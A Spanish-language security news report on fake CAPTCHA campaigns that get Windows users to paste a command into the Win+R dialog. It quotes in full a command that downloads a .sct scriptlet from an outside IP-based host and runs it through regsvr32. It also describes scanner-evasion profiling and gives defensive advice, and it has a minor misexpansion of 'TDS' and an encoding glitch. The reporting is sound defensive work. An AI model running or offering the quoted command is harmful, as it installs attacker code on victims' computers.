Campañas de CAPTCHA falsas usan Win+R para ejecutar malware en Windows
Investigadores descubren scripts maliciosos que se activan mediante la combinación Windows + R, descargando payloads según la ubicación del usuario.
Un nuevo vector de ataque se ha detectado en la web: CAPTCHA falsos que solicitan al usuario pulsar Win + R y ejecutar un comando. El script, distribuido a través de pop‑ups en sitios populares, descarga un ejecutable desde un servidor externo y lo registra como DLL mediante regsvr32.
El código observado es el siguiente:
pcalua.exe -a cmd -c "/c curl.exe -s https://193-233-126-53.sslip.io/d3f8a142c9/verification.sct -o %TEMP%\v.sct&®svr32 /s /n /u /i:%TEMP%\v.sct scrobj.dll"
Según el informe de Daniel Jones, el script incluye un TDS (Threat Detection System) que perfila el agente de usuario, la dirección IP y otros datos del dispositivo. Cuando la petición proviene de un IP de centro de datos, se muestra una página limpia que suele pasar los escáneres de URL. Si la IP es residencial o móvil, se entrega el payload real. Además, si el fingerprint indica que el cliente es un bot o un escáner, se redirige a un dominio de monetización.
El objetivo parece ser engañar a usuarios de Windows que, al ejecutar la combinación de teclas, lanzan una ventana de ejecución donde se pega el comando. En Linux o macOS el ataque no se dispara porque el prompt no reconoce la combinación, lo que explica por qué algunos investigadores no lo han visto aún.
Jim, otro analista que comentó en la entrada, confirmó que el script se ejecutó en un sitio bien conocido y que el archivo descargado es un .sct (script de Microsoft) que, una vez registrado, permite la ejecución de código arbitrario. El atacante usa regsvr32 con los flags /s /n /u /i para cargar la DLL sin mostrar alertas al usuario.
Los investigadores recomiendan desactivar la función de ejecución rápida de comandos en entornos corporativos y bloquear la descarga de archivos ejecutables desde dominios desconocidos, especialmente los que usan la extensión .sct. También es aconsejable monitorear los logs de regsvr32 y de procesos que invoquen curl o pcalua.
Este esquema se alinea con técnicas previamente catalogadas bajo los nombres ClickFix y FileFix, que combinan ingeniería social con scripts de registro para evadir detección. La comunidad de seguridad sigue recopilando indicadores de compromiso (IOC) y publicando análisis detallados.
¿Qué queda por ver?
Aún se desconoce la escala real de la campaña y si los operadores están vinculados a grupos de crimen organizado. Seguiremos monitorizando los dominios involucrados y actualizando los filtros de detección a medida que aparezcan nuevas variantes.
